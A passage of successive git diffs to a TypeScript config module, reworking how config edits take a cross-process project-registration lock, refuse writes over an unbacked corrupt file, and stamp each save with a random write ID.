-                } catch (readError) {
-                  if ((readError as NodeJS.ErrnoException).code !== "ENOENT") {
-                    rejectEdit(
-                      `the file could not be re-read before writing (${readError instanceof Error ? readError.message : String(readError)}). Retry the settings change.`
-                    );
-                  }
-                }
-                if (
-                  currentSignature !== null &&
-                  currentSignature !== failureState.backupSignature
-                ) {
-                  rejectEdit(
-                    "the file changed after this edit loaded it and the new content has no confirmed backup. Retry the settings change."
-                  );
-                }
-              }
-              return newConfig;
+              const result = transform();
+              self.assertConfigWritable();
+              return result;
             },
             catch: (error) => error,
           });
-          // Route through the saveConfig Promise facade (not saveConfigEffect) so test
-          // spies on saveConfig keep intercepting the serialized write.
-          yield* Effect.promise(async () => self.saveConfig(newConfig));
-          // Backend-initiated config edits (for example gateway auth changes) use this signal
-          // so frontend subscribers can refresh derived state without polling.
-          self.notifyConfigChanged();
+          if (registrationLock === "held" || !first.changesProjects) {
+            return yield* write(first.newConfig);
+          }
+          // The project set changes. Before the write, so the permit is released and
+          // editConfig retries this edit under the full lock; see editConfig.
+          if (registrationLock === "none") {
+            return yield* Effect.fail(new ProjectRegistrationLockRequired());
+          }
+          // The in-process mutex is held; the cross-process leg is tried here, inside the
+          // queue slot so the edit keeps its order. Held by another process, the edit fails
+          // the slot and editConfig waits for the lock outside the queue. Under the lock the
+          // transform runs again on the bytes as they are: another process may have written
+          // config.json between the first run and the acquisition, and a snapshot from before
+          // it would clobber whatever that process registered.
+          yield* Effect.tryPromise({
+            try: async () => {
+              await using lock = await tryProjectRegistrationFileLock(self.rootDir);
+              if (lock === null) throw new ProjectRegistrationLockContended();
+              const fresh = transform();
+              await Effect.runPromise(write(fresh.newConfig));
+            },
+            catch: (error) => error,
+          });
         })
       )
     );
+  }
+
+  /**
+   * The corrupt-file gate an edit passes immediately before writing. If the load failed,
+   * writing would replace the corrupt file with defaults. Only proceed when the bytes on
+   * disk right now are the ones with a confirmed sidecar: no confirmed backup, a concurrent
+   * replacement since the load, or an unreadable file all reject the edit so callers do not
+   * treat the mutation as durable (unlike saveConfig's log-and-swallow of unexpected I/O
+   * errors, this skip is deliberate). A missing file is safe to overwrite. This cannot fully
+   * close the cross-process race (that needs file locking, which editConfig has never had);
+   * it binds the approval to the current bytes and shrinks the window to the atomic write
+   * itself.
+   */
+  private assertConfigWritable(): void {
+    const failureState = configLoadFailureStates.get(this.configFile);
+    if (!failureState) return;
+    const rejectEdit = (reason: string): never => {
+      const message = `Skipping config write to ${this.configFile}: ${reason}`;
+      log.error(message);
+      throw new Error(message);
+    };
+    if (failureState.backupSignature === null) {
+      rejectEdit(
+        "the existing corrupt config has no confirmed backup yet. Fix the reported backup failure or move the corrupt file aside, then retry."
+      );
+    }
+    let currentSignature: string | null = null;
+    try {
+      const currentBytes = fs.readFileSync(this.configFile);
+      currentSignature = crypto.createHash("sha256").update(currentBytes).digest("hex");
+    } catch (readError) {
+      if ((readError as NodeJS.ErrnoException).code !== "ENOENT") {
+        rejectEdit(
+          `the file could not be re-read before writing (${readError instanceof Error ? readError.message : String(readError)}). Retry the settings change.`
+        );
+      }
+    }
+    if (currentSignature !== null && currentSignature !== failureState.backupSignature) {
+      rejectEdit(
+        "the file changed after this edit loaded it and the new content has no confirmed backup. Retry the settings change."
+      );
+    }
   }
 
   getUpdateChannel(): UpdateChannel {

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -1893,6 +1893,8 @@ export class Config {
       const data: Partial<Record<keyof AppConfigOnDisk, unknown>> & {
         projects: Array<[string, ProjectConfig]>;
       } = {
+        // Stamped by every save; see configFileWriteGeneration.
+        writeId: crypto.randomUUID(),
         projects: Array.from(config.projects.entries()).map(([projectPath, projectConfig]) => {
           const normalizedProjectConfig = normalizeProjectRuntimeSettings(projectConfig);
           const persistedProjectConfig = {
@@ -2187,21 +2189,39 @@ export class Config {
   }
 
   /**
-   * The config file as a write generation: its inode, mtime, and size, which every save
-   * changes — a save renames a fresh file into place — even when the bytes written are the
-   * ones already there, and whichever process wrote it. For a caller that reads the project
-   * registry at two points and needs to know whether anything happened in between: a
-   * registration, a removal, or a removal and a re-registration with identical config, which
-   * the registry's content alone cannot show. "absent" when there is no file.
+   * The config file as a write generation, for a caller that reads the project registry at
+   * two points and needs to know whether anything was written in between — a registration, a
+   * removal, or a removal and a re-registration with identical config, which the registry's
+   * content alone cannot show. Two parts: the `writeId` every save of this class stamps into
+   * the file, a fresh random value that two writes cannot share even when they write the same
+   * bytes (a timestamp can, on a filesystem with coarse mtimes, and so can an inode the
+   * allocator hands out again); and the file's inode, mtime, and size, for writers that do
+   * not stamp (an older build, the config tool), whose writes at least usually change those.
+   * "absent" when there is no file.
    */
   async configFileWriteGeneration(): Promise<string> {
+    let stat: fs.Stats;
     try {
-      const stat = await fs.promises.stat(this.configFile);
-      return `${stat.ino}:${stat.mtimeMs}:${stat.size}`;
+      stat = await fs.promises.stat(this.configFile);
     } catch (error) {
       if ((error as NodeJS.ErrnoException).code === "ENOENT") return "absent";
       throw error;
     }
+    let writeId = "-";
+    try {
+      const parsed: unknown = JSON.parse(await fs.promises.readFile(this.configFile, "utf-8"));
+      if (
+        typeof parsed === "object" &&
+        parsed !== null &&
+        typeof (parsed as { writeId?: unknown }).writeId === "string"
+      ) {
+        writeId = (parsed as { writeId: string }).writeId;
+      }
+    } catch {
+      // Unreadable or not JSON: the stat part still distinguishes most writes, and the
+      // caller's content comparison the rest it cares about.
+    }
+    return `${writeId}:${stat.ino}:${stat.mtimeMs}:${stat.size}`;
   }
 
   /**

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -88,6 +88,7 @@ import { getContainerName as getDockerContainerName } from "@/node/runtime/Docke
 import { deriveProjectHierarchy } from "@/common/utils/subProjects";
 import {
   isProjectRegistrationMutexHeld,
+  type ProjectRegistrationLockHandle,
   tryProjectRegistrationFileLock,
   withProjectRegistrationFileLock,
   withProjectRegistrationLock,
@@ -910,7 +911,10 @@ function normalizeAdvisorPositiveInteger(value: number | null, label: string): n
  * `held` both legs (issued inside a restore or import window), `in-process` the mutex only
  * (editConfig's free path; the file lock is taken in the queue slot if needed), `none`.
  */
-type RegistrationLockState = "held" | "in-process" | "none";
+type RegistrationLockState =
+  | { kind: "held"; lock: ProjectRegistrationLockHandle }
+  | { kind: "in-process" }
+  | { kind: "none" };
 
 /** Thrown inside the edit queue when a transform changes the project set without the lock. */
 class ProjectRegistrationLockRequired extends Error {
@@ -2207,9 +2211,11 @@ export class Config {
    */
   async editConfig(
     fn: (config: ProjectsConfig) => ProjectsConfig,
-    options: { withinRegistrationLock?: boolean } = {}
+    options: { withinRegistrationLock?: ProjectRegistrationLockHandle } = {}
   ): Promise<void> {
-    if (options.withinRegistrationLock === true) return this.enqueueConfigEdit(fn, "held");
+    if (options.withinRegistrationLock !== undefined) {
+      return this.enqueueConfigEdit(fn, { kind: "held", lock: options.withinRegistrationLock });
+    }
     return this.enqueueGatedConfigEdit(fn);
   }
 
@@ -2230,11 +2236,11 @@ export class Config {
     if (!isProjectRegistrationMutexHeld(this.rootDir)) {
       return withProjectRegistrationMutex(this.rootDir, async () => {
         try {
-          return await this.enqueueConfigEdit(fn, "in-process");
+          return await this.enqueueConfigEdit(fn, { kind: "in-process" });
         } catch (error) {
           if (!(error instanceof ProjectRegistrationLockContended)) throw error;
-          return withProjectRegistrationFileLock(this.rootDir, () =>
-            this.enqueueConfigEdit(fn, "held")
+          return withProjectRegistrationFileLock(this.rootDir, (lock) =>
+            this.enqueueConfigEdit(fn, { kind: "held", lock })
           );
         }
       });
@@ -2245,10 +2251,12 @@ export class Config {
     // discarded — nothing it mutated survives, since loadConfigOrDefault parses fresh bytes
     // on every call — and it waits outside the queue, so no other edit is held up behind it.
     try {
-      return await this.enqueueConfigEdit(fn, "none");
+      return await this.enqueueConfigEdit(fn, { kind: "none" });
     } catch (error) {
       if (!(error instanceof ProjectRegistrationLockRequired)) throw error;
-      return withProjectRegistrationLock(this.rootDir, () => this.enqueueConfigEdit(fn, "held"));
+      return withProjectRegistrationLock(this.rootDir, (lock) =>
+        this.enqueueConfigEdit(fn, { kind: "held", lock })
+      );
     }
   }
 
@@ -2596,13 +2604,21 @@ export class Config {
         changesProjects: !sameProjectKeys(projectKeysBefore, newConfig.projects),
       };
     };
-    const write = Effect.fn(function* (newConfig: ProjectsConfig) {
+    const write = Effect.fn(function* (
+      newConfig: ProjectsConfig,
+      lock: ProjectRegistrationLockHandle | null
+    ) {
       // Effect.try keeps the pre-Effect contract: a rejected corrupt-file gate reaches the
       // caller as the raw original error.
       yield* Effect.try({
         try: () => self.assertConfigWritable(),
         catch: (error) => error,
       });
+      // A project-set change commits under the registration lock: immediately before the
+      // write, confirm this process still holds it (see ProjectRegistrationLockHandle).
+      if (lock !== null) {
+        yield* Effect.tryPromise({ try: () => lock.assertStillOwned(), catch: (error) => error });
+      }
       // Route through the saveConfig Promise facade (not saveConfigEffect) so test
       // spies on saveConfig keep intercepting the serialized write.
       yield* Effect.promise(async () => self.saveConfig(newConfig));
@@ -2625,12 +2641,15 @@ export class Config {
             },
             catch: (error) => error,
           });
-          if (registrationLock === "held" || !first.changesProjects) {
-            return yield* write(first.newConfig);
+          if (!first.changesProjects) {
+            return yield* write(first.newConfig, null);
+          }
+          if (registrationLock.kind === "held") {
+            return yield* write(first.newConfig, registrationLock.lock);
           }
           // The project set changes. Before the write, so the permit is released and
           // editConfig retries this edit under the full lock; see editConfig.
-          if (registrationLock === "none") {
+          if (registrationLock.kind === "none") {
             return yield* Effect.fail(new ProjectRegistrationLockRequired());
           }
           // The in-process mutex is held; the cross-process leg is tried here, inside the
@@ -2644,7 +2663,7 @@ export class Config {
               await using lock = await tryProjectRegistrationFileLock(self.rootDir);
               if (lock === null) throw new ProjectRegistrationLockContended();
               const fresh = transform();
-              await Effect.runPromise(write(fresh.newConfig));
+              await Effect.runPromise(write(fresh.newConfig, lock));
             },
             catch: (error) => error,
           });

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -911,10 +911,14 @@ type RegistrationLockState =
   | { kind: "held"; lock: ProjectRegistrationLockHandle }
   | { kind: "none" };
 
-/** Thrown inside the edit queue when another process holds the registration file lock. */
+/**
+ * Thrown inside the edit queue when the edit could not take the registration file lock in
+ * its slot; `rerun` is the edit's re-run under the lock, already queued behind the edits
+ * waiting for it (see Config.lockWaiters).
+ */
 class ProjectRegistrationLockContended extends Error {
-  constructor() {
-    super("project registration lock held by another process");
+  constructor(readonly rerun: Promise<void>) {
+    super("project registration lock held elsewhere");
     this.name = "ProjectRegistrationLockContended";
   }
 }
@@ -951,6 +955,17 @@ export class Config {
    * edit's failure never wedges later edits).
    */
   private readonly editSemaphore = Semaphore.makeUnsafe(1);
+  /**
+   * The edits that left their queue slot to wait for the registration file lock, as a chain
+   * in slot order; null while none is waiting. The file lock is not fair — waiters poll it,
+   * and two polling independently would acquire in arbitrary order, so the later of two
+   * edits could write first and the earlier one then overwrite it, reversing the order
+   * editConfig promises. Waiting edits therefore re-run one after another off this chain,
+   * and while it is non-empty every edit reaching its slot joins the tail instead of trying
+   * the lock: it would otherwise take a lock that had just been released ahead of an edit
+   * that has been waiting for it since before the later edit was issued.
+   */
+  private lockWaiters: Promise<void> | null = null;
   /** One-shot guard for the queued load-time migration persist; see loadConfigOrDefault. */
   private migrationPersist: Promise<void> | null = null;
 
@@ -2220,17 +2235,40 @@ export class Config {
     // Straight into the queue, in call order: the edit takes its own hold of the file lock
     // inside its slot, at write time. When the lock is held elsewhere — another process, or
     // a restore, import, or create window in this one — the edit fails the slot before
-    // writing and is re-run here once it has waited for the lock, outside the queue, so no
-    // other edit is held up behind its wait. Its first run was discarded: nothing it mutated
-    // survives, since loadConfigOrDefault parses fresh bytes on every call.
+    // writing and is re-run once it has waited for the lock, outside the queue (so an edit
+    // issued inside the window is not held up behind its wait) but behind the edits already
+    // waiting (see lockWaiters). Its first run was discarded: nothing it mutated survives,
+    // since loadConfigOrDefault parses fresh bytes on every call.
     try {
       return await this.enqueueConfigEdit(fn, { kind: "none" });
     } catch (error) {
       if (!(error instanceof ProjectRegistrationLockContended)) throw error;
-      return withProjectRegistrationFileLock(this.rootDir, (lock) =>
-        this.enqueueConfigEdit(fn, { kind: "held", lock })
-      );
+      return error.rerun;
     }
+  }
+
+  /**
+   * Queues `fn` to re-run under the registration file lock after every edit already waiting
+   * for it, and records the chain's new tail. Called synchronously from the edit's queue
+   * slot, so the chain order is the slot order.
+   */
+  private joinLockWaiters(fn: (config: ProjectsConfig) => ProjectsConfig): Promise<void> {
+    const rerun = (this.lockWaiters ?? Promise.resolve()).then(() =>
+      withProjectRegistrationFileLock(this.rootDir, (lock) =>
+        this.enqueueConfigEdit(fn, { kind: "held", lock })
+      )
+    );
+    // The tail settles either way, so one edit's failure never wedges the ones behind it.
+    const tail: Promise<void> = rerun.then(
+      () => this.leaveLockWaiters(tail),
+      () => this.leaveLockWaiters(tail)
+    );
+    this.lockWaiters = tail;
+    return rerun;
+  }
+
+  private leaveLockWaiters(tail: Promise<void>): void {
+    if (this.lockWaiters === tail) this.lockWaiters = null;
   }
 
   getClientConfig() {
@@ -2619,13 +2657,19 @@ export class Config {
           }
           // The file lock is tried here, inside the queue slot so the edit keeps its order.
           // Held elsewhere — by another process, or by a window in this one — the edit fails
-          // the slot and editConfig waits for the lock outside the queue. Under the lock the
-          // transform runs again on the bytes as they are: whoever held it may have written
-          // config.json since the first run, and a snapshot from before would clobber that.
+          // the slot and editConfig waits for the lock outside the queue, behind any edit
+          // already waiting; while one is, the lock is not even tried, since taking it would
+          // put this edit ahead of that one. Under the lock the transform runs again on the
+          // bytes as they are: whoever held it may have written config.json since the first
+          // run, and a snapshot from before would clobber that.
           yield* Effect.tryPromise({
             try: async () => {
+              if (self.lockWaiters !== null) {
+                throw new ProjectRegistrationLockContended(self.joinLockWaiters(fn));
+              }
               await using lock = await tryProjectRegistrationFileLock(self.rootDir);
-              if (lock === null) throw new ProjectRegistrationLockContended();
+              if (lock === null)
+                throw new ProjectRegistrationLockContended(self.joinLockWaiters(fn));
               const fresh = transform();
               await Effect.runPromise(write(fresh.newConfig, lock));
             },

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -87,12 +87,12 @@ import { isProviderAutoRouteEligible } from "@/node/utils/providerRequirements";
 import { getContainerName as getDockerContainerName } from "@/node/runtime/DockerRuntime";
 import { deriveProjectHierarchy } from "@/common/utils/subProjects";
 import {
+  isProjectRegistrationFileLockHeld,
   isProjectRegistrationMutexHeld,
   type ProjectRegistrationLockHandle,
   tryProjectRegistrationFileLock,
   withProjectRegistrationFileLock,
   withProjectRegistrationLock,
-  withProjectRegistrationMutex,
 } from "@/node/config/projectRegistrationLock";
 import { coerceThinkingLevel, type ThinkingLevel } from "@/common/types/thinking";
 
@@ -908,15 +908,13 @@ function normalizeAdvisorPositiveInteger(value: number | null, label: string): n
 
 /**
  * What an edit already holds of the project registration lock when it enters the queue:
- * `held` both legs (issued inside a restore or import window), `in-process` the mutex only
- * (editConfig's free path; the file lock is taken in the queue slot if needed), `none`.
+ * `held` (issued inside a window, or re-run under a lock editConfig took for it), or `none`.
  */
 type RegistrationLockState =
   | { kind: "held"; lock: ProjectRegistrationLockHandle }
-  | { kind: "in-process" }
   | { kind: "none" };
 
-/** Thrown inside the edit queue when a transform changes the project set without the lock. */
+/** Thrown inside the edit queue when a transform changes the project set while a window runs here. */
 class ProjectRegistrationLockRequired extends Error {
   constructor() {
     super("project registration lock required");
@@ -2230,37 +2228,26 @@ export class Config {
   private async enqueueGatedConfigEdit(
     fn: (config: ProjectsConfig) => ProjectsConfig
   ): Promise<void> {
-    // Mutex free: taken now, around this one edit. Its free path runs synchronously, so the
-    // edit keeps its place in the queue relative to edits issued around it. The cross-process
-    // leg is tried inside the queue slot; only when another process holds it does the edit
-    // step out of the queue to wait, so no other edit is held up behind a wait on another
-    // process.
-    if (!isProjectRegistrationMutexHeld(this.rootDir)) {
-      return withProjectRegistrationMutex(this.rootDir, async () => {
-        try {
-          return await this.enqueueConfigEdit(fn, { kind: "in-process" });
-        } catch (error) {
-          if (!(error instanceof ProjectRegistrationLockContended)) throw error;
-          return withProjectRegistrationFileLock(this.rootDir, (lock) =>
-            this.enqueueConfigEdit(fn, { kind: "held", lock })
-          );
-        }
-      });
-    }
-    // Mutex held (a restore or an import window is running in this process, and with it the
-    // cross-process lock, so other processes are excluded already): edits that leave the
-    // project set alone go ahead under that hold; one that would change it is refused by the
-    // queue before writing and re-run under the full lock once the window ends. Its first run
-    // was discarded — nothing it mutated survives, since loadConfigOrDefault parses fresh
-    // bytes on every call — and it waits outside the queue, so no other edit is held up
-    // behind it.
+    // Straight into the queue, in call order: everything the edit needs is decided inside
+    // its slot, at write time. An edit that cannot commit there — it would change the project
+    // set while a window runs in this process, or another process holds the file lock — fails
+    // the slot before writing and is re-run here under the lock it lacked, outside the queue,
+    // so no other edit is held up behind its wait. Its first run was discarded: nothing it
+    // mutated survives, since loadConfigOrDefault parses fresh bytes on every call.
     try {
       return await this.enqueueConfigEdit(fn, { kind: "none" });
     } catch (error) {
-      if (!(error instanceof ProjectRegistrationLockRequired)) throw error;
-      return withProjectRegistrationLock(this.rootDir, (lock) =>
-        this.enqueueConfigEdit(fn, { kind: "held", lock })
-      );
+      if (error instanceof ProjectRegistrationLockRequired) {
+        return withProjectRegistrationLock(this.rootDir, (lock) =>
+          this.enqueueConfigEdit(fn, { kind: "held", lock })
+        );
+      }
+      if (error instanceof ProjectRegistrationLockContended) {
+        return withProjectRegistrationFileLock(this.rootDir, (lock) =>
+          this.enqueueConfigEdit(fn, { kind: "held", lock })
+        );
+      }
+      throw error;
     }
   }
 
@@ -2654,22 +2641,22 @@ export class Config {
               first.changesProjects ? registrationLock.lock : null
             );
           }
-          if (registrationLock.kind === "none") {
-            // Issued while a window runs in this process: the window's hold covers this edit
-            // against other processes. Changing the project set under it is not allowed, so
-            // that edit fails the slot before writing and editConfig re-runs it under the
-            // full lock once the window ends; see editConfig.
-            if (first.changesProjects) {
-              return yield* Effect.fail(new ProjectRegistrationLockRequired());
-            }
+          // Changing the project set while a window runs in this process is not allowed:
+          // the edit fails the slot before writing and editConfig re-runs it under the full
+          // lock once the window ends. Only windows take the mutex, so held means a window.
+          if (first.changesProjects && isProjectRegistrationMutexHeld(self.rootDir)) {
+            return yield* Effect.fail(new ProjectRegistrationLockRequired());
+          }
+          // Under a hold this process already has (a window's), the write is covered.
+          if (isProjectRegistrationFileLockHeld(self.rootDir)) {
             return yield* write(first.newConfig, null);
           }
-          // The in-process mutex is held; the cross-process leg is tried here, inside the
-          // queue slot so the edit keeps its order. Held by another process, the edit fails
-          // the slot and editConfig waits for the lock outside the queue. Under the lock the
-          // transform runs again on the bytes as they are: another process may have written
-          // config.json between the first run and the acquisition, and a snapshot from before
-          // it would clobber whatever that process wrote.
+          // Otherwise the cross-process leg is tried here, inside the queue slot so the edit
+          // keeps its order. Held by another process, the edit fails the slot and editConfig
+          // waits for the lock outside the queue. Under the lock the transform runs again on
+          // the bytes as they are: another process may have written config.json between the
+          // first run and the acquisition, and a snapshot from before it would clobber
+          // whatever that process wrote.
           yield* Effect.tryPromise({
             try: async () => {
               await using lock = await tryProjectRegistrationFileLock(self.rootDir);

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -2187,6 +2187,24 @@ export class Config {
   }
 
   /**
+   * The config file as a write generation: its inode, mtime, and size, which every save
+   * changes — a save renames a fresh file into place — even when the bytes written are the
+   * ones already there, and whichever process wrote it. For a caller that reads the project
+   * registry at two points and needs to know whether anything happened in between: a
+   * registration, a removal, or a removal and a re-registration with identical config, which
+   * the registry's content alone cannot show. "absent" when there is no file.
+   */
+  async configFileWriteGeneration(): Promise<string> {
+    try {
+      const stat = await fs.promises.stat(this.configFile);
+      return `${stat.ino}:${stat.mtimeMs}:${stat.size}`;
+    } catch (error) {
+      if ((error as NodeJS.ErrnoException).code === "ENOENT") return "absent";
+      throw error;
+    }
+  }
+
+  /**
    * Edit config atomically using a transformation function
    * @param fn Function that takes current config and returns modified config
    *

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -87,12 +87,9 @@ import { isProviderAutoRouteEligible } from "@/node/utils/providerRequirements";
 import { getContainerName as getDockerContainerName } from "@/node/runtime/DockerRuntime";
 import { deriveProjectHierarchy } from "@/common/utils/subProjects";
 import {
-  currentProjectRegistrationFileLock,
-  isProjectRegistrationMutexHeld,
   type ProjectRegistrationLockHandle,
   tryProjectRegistrationFileLock,
   withProjectRegistrationFileLock,
-  withProjectRegistrationLock,
 } from "@/node/config/projectRegistrationLock";
 import { coerceThinkingLevel, type ThinkingLevel } from "@/common/types/thinking";
 
@@ -913,14 +910,6 @@ function normalizeAdvisorPositiveInteger(value: number | null, label: string): n
 type RegistrationLockState =
   | { kind: "held"; lock: ProjectRegistrationLockHandle }
   | { kind: "none" };
-
-/** Thrown inside the edit queue when a transform changes the project set while a window runs here. */
-class ProjectRegistrationLockRequired extends Error {
-  constructor() {
-    super("project registration lock required");
-    this.name = "ProjectRegistrationLockRequired";
-  }
-}
 
 /** Thrown inside the edit queue when another process holds the registration file lock. */
 class ProjectRegistrationLockContended extends Error {
@@ -2228,26 +2217,19 @@ export class Config {
   private async enqueueGatedConfigEdit(
     fn: (config: ProjectsConfig) => ProjectsConfig
   ): Promise<void> {
-    // Straight into the queue, in call order: everything the edit needs is decided inside
-    // its slot, at write time. An edit that cannot commit there — it would change the project
-    // set while a window runs in this process, or another process holds the file lock — fails
-    // the slot before writing and is re-run here under the lock it lacked, outside the queue,
-    // so no other edit is held up behind its wait. Its first run was discarded: nothing it
-    // mutated survives, since loadConfigOrDefault parses fresh bytes on every call.
+    // Straight into the queue, in call order: the edit takes its own hold of the file lock
+    // inside its slot, at write time. When the lock is held elsewhere — another process, or
+    // a restore, import, or create window in this one — the edit fails the slot before
+    // writing and is re-run here once it has waited for the lock, outside the queue, so no
+    // other edit is held up behind its wait. Its first run was discarded: nothing it mutated
+    // survives, since loadConfigOrDefault parses fresh bytes on every call.
     try {
       return await this.enqueueConfigEdit(fn, { kind: "none" });
     } catch (error) {
-      if (error instanceof ProjectRegistrationLockRequired) {
-        return withProjectRegistrationLock(this.rootDir, (lock) =>
-          this.enqueueConfigEdit(fn, { kind: "held", lock })
-        );
-      }
-      if (error instanceof ProjectRegistrationLockContended) {
-        return withProjectRegistrationFileLock(this.rootDir, (lock) =>
-          this.enqueueConfigEdit(fn, { kind: "held", lock })
-        );
-      }
-      throw error;
+      if (!(error instanceof ProjectRegistrationLockContended)) throw error;
+      return withProjectRegistrationFileLock(this.rootDir, (lock) =>
+        this.enqueueConfigEdit(fn, { kind: "held", lock })
+      );
     }
   }
 
@@ -2635,24 +2617,11 @@ export class Config {
           if (registrationLock.kind === "held") {
             return yield* write(first.newConfig, registrationLock.lock);
           }
-          // Changing the project set while a window runs in this process is not allowed:
-          // the edit fails the slot before writing and editConfig re-runs it under the full
-          // lock once the window ends. Only windows take the mutex, so held means a window.
-          if (first.changesProjects && isProjectRegistrationMutexHeld(self.rootDir)) {
-            return yield* Effect.fail(new ProjectRegistrationLockRequired());
-          }
-          // Under a hold this process already has (a window's), the write is covered by it
-          // and verified through it.
-          const currentHold = currentProjectRegistrationFileLock(self.rootDir);
-          if (currentHold !== null) {
-            return yield* write(first.newConfig, currentHold);
-          }
-          // Otherwise the cross-process leg is tried here, inside the queue slot so the edit
-          // keeps its order. Held by another process, the edit fails the slot and editConfig
-          // waits for the lock outside the queue. Under the lock the transform runs again on
-          // the bytes as they are: another process may have written config.json between the
-          // first run and the acquisition, and a snapshot from before it would clobber
-          // whatever that process wrote.
+          // The file lock is tried here, inside the queue slot so the edit keeps its order.
+          // Held elsewhere — by another process, or by a window in this one — the edit fails
+          // the slot and editConfig waits for the lock outside the queue. Under the lock the
+          // transform runs again on the bytes as they are: whoever held it may have written
+          // config.json since the first run, and a snapshot from before would clobber that.
           yield* Effect.tryPromise({
             try: async () => {
               await using lock = await tryProjectRegistrationFileLock(self.rootDir);

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -2220,19 +2220,21 @@ export class Config {
   }
 
   /**
-   * The registration gate for an edit issued outside any registration window; shared by
+   * The cross-process gate for an edit issued outside any registration window; shared by
    * editConfig and the load-time migration persist (which must not call the public, commonly
-   * spied editConfig).
+   * spied editConfig). Every edit persists the whole config, project map included, from the
+   * bytes its transform read, so every edit's read and write have to happen under the
+   * cross-process lock or a registration another process makes in between is silently
+   * dropped by this process's save — even by an edit that never touched the project set.
    */
   private async enqueueGatedConfigEdit(
     fn: (config: ProjectsConfig) => ProjectsConfig
   ): Promise<void> {
-    // Mutex free: taken now, around this one edit, whether or not it turns out to change the
-    // project set. Its free path runs synchronously, so the edit keeps its place in the
-    // queue relative to edits issued around it. The cross-process leg is tried inside the
-    // queue slot once the transform has shown it changes the project set; only when another
-    // process holds it does the edit step out of the queue to wait, so no other edit is
-    // held up behind a wait on another process.
+    // Mutex free: taken now, around this one edit. Its free path runs synchronously, so the
+    // edit keeps its place in the queue relative to edits issued around it. The cross-process
+    // leg is tried inside the queue slot; only when another process holds it does the edit
+    // step out of the queue to wait, so no other edit is held up behind a wait on another
+    // process.
     if (!isProjectRegistrationMutexHeld(this.rootDir)) {
       return withProjectRegistrationMutex(this.rootDir, async () => {
         try {
@@ -2245,11 +2247,13 @@ export class Config {
         }
       });
     }
-    // Mutex held (a restore or an import window is running in this process): edits that
-    // leave the project set alone go ahead; one that would change it is refused by the queue
-    // before writing and re-run under the full lock once the window ends. Its first run was
-    // discarded — nothing it mutated survives, since loadConfigOrDefault parses fresh bytes
-    // on every call — and it waits outside the queue, so no other edit is held up behind it.
+    // Mutex held (a restore or an import window is running in this process, and with it the
+    // cross-process lock, so other processes are excluded already): edits that leave the
+    // project set alone go ahead under that hold; one that would change it is refused by the
+    // queue before writing and re-run under the full lock once the window ends. Its first run
+    // was discarded — nothing it mutated survives, since loadConfigOrDefault parses fresh
+    // bytes on every call — and it waits outside the queue, so no other edit is held up
+    // behind it.
     try {
       return await this.enqueueConfigEdit(fn, { kind: "none" });
     } catch (error) {
@@ -2615,7 +2619,10 @@ export class Config {
         catch: (error) => error,
       });
       // A project-set change commits under the registration lock: immediately before the
-      // write, confirm this process still holds it (see ProjectRegistrationLockHandle).
+      // write, confirm this process still holds it (see ProjectRegistrationLockHandle). Other
+      // edits under the lock are covered against concurrent writers by holding it; a lost
+      // hold would cost them at most the same overwrite the lock exists to prevent for
+      // registrations, and re-verifying every edit is not worth a lockfile read each.
       if (lock !== null) {
         yield* Effect.tryPromise({ try: () => lock.assertStillOwned(), catch: (error) => error });
       }
@@ -2641,29 +2648,34 @@ export class Config {
             },
             catch: (error) => error,
           });
-          if (!first.changesProjects) {
-            return yield* write(first.newConfig, null);
-          }
           if (registrationLock.kind === "held") {
-            return yield* write(first.newConfig, registrationLock.lock);
+            return yield* write(
+              first.newConfig,
+              first.changesProjects ? registrationLock.lock : null
+            );
           }
-          // The project set changes. Before the write, so the permit is released and
-          // editConfig retries this edit under the full lock; see editConfig.
           if (registrationLock.kind === "none") {
-            return yield* Effect.fail(new ProjectRegistrationLockRequired());
+            // Issued while a window runs in this process: the window's hold covers this edit
+            // against other processes. Changing the project set under it is not allowed, so
+            // that edit fails the slot before writing and editConfig re-runs it under the
+            // full lock once the window ends; see editConfig.
+            if (first.changesProjects) {
+              return yield* Effect.fail(new ProjectRegistrationLockRequired());
+            }
+            return yield* write(first.newConfig, null);
           }
           // The in-process mutex is held; the cross-process leg is tried here, inside the
           // queue slot so the edit keeps its order. Held by another process, the edit fails
           // the slot and editConfig waits for the lock outside the queue. Under the lock the
           // transform runs again on the bytes as they are: another process may have written
           // config.json between the first run and the acquisition, and a snapshot from before
-          // it would clobber whatever that process registered.
+          // it would clobber whatever that process wrote.
           yield* Effect.tryPromise({
             try: async () => {
               await using lock = await tryProjectRegistrationFileLock(self.rootDir);
               if (lock === null) throw new ProjectRegistrationLockContended();
               const fresh = transform();
-              await Effect.runPromise(write(fresh.newConfig, lock));
+              await Effect.runPromise(write(fresh.newConfig, fresh.changesProjects ? lock : null));
             },
             catch: (error) => error,
           });

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -87,7 +87,7 @@ import { isProviderAutoRouteEligible } from "@/node/utils/providerRequirements";
 import { getContainerName as getDockerContainerName } from "@/node/runtime/DockerRuntime";
 import { deriveProjectHierarchy } from "@/common/utils/subProjects";
 import {
-  isProjectRegistrationFileLockHeld,
+  currentProjectRegistrationFileLock,
   isProjectRegistrationMutexHeld,
   type ProjectRegistrationLockHandle,
   tryProjectRegistrationFileLock,
@@ -2597,7 +2597,7 @@ export class Config {
     };
     const write = Effect.fn(function* (
       newConfig: ProjectsConfig,
-      lock: ProjectRegistrationLockHandle | null
+      lock: ProjectRegistrationLockHandle
     ) {
       // Effect.try keeps the pre-Effect contract: a rejected corrupt-file gate reaches the
       // caller as the raw original error.
@@ -2605,14 +2605,11 @@ export class Config {
         try: () => self.assertConfigWritable(),
         catch: (error) => error,
       });
-      // A project-set change commits under the registration lock: immediately before the
-      // write, confirm this process still holds it (see ProjectRegistrationLockHandle). Other
-      // edits under the lock are covered against concurrent writers by holding it; a lost
-      // hold would cost them at most the same overwrite the lock exists to prevent for
-      // registrations, and re-verifying every edit is not worth a lockfile read each.
-      if (lock !== null) {
-        yield* Effect.tryPromise({ try: () => lock.assertStillOwned(), catch: (error) => error });
-      }
+      // Every save happens under this process's hold of the registration lock: immediately
+      // before the write, confirm the hold is still ours (see ProjectRegistrationLockHandle).
+      // A whole-config save from a hold another process reclaimed would drop whatever that
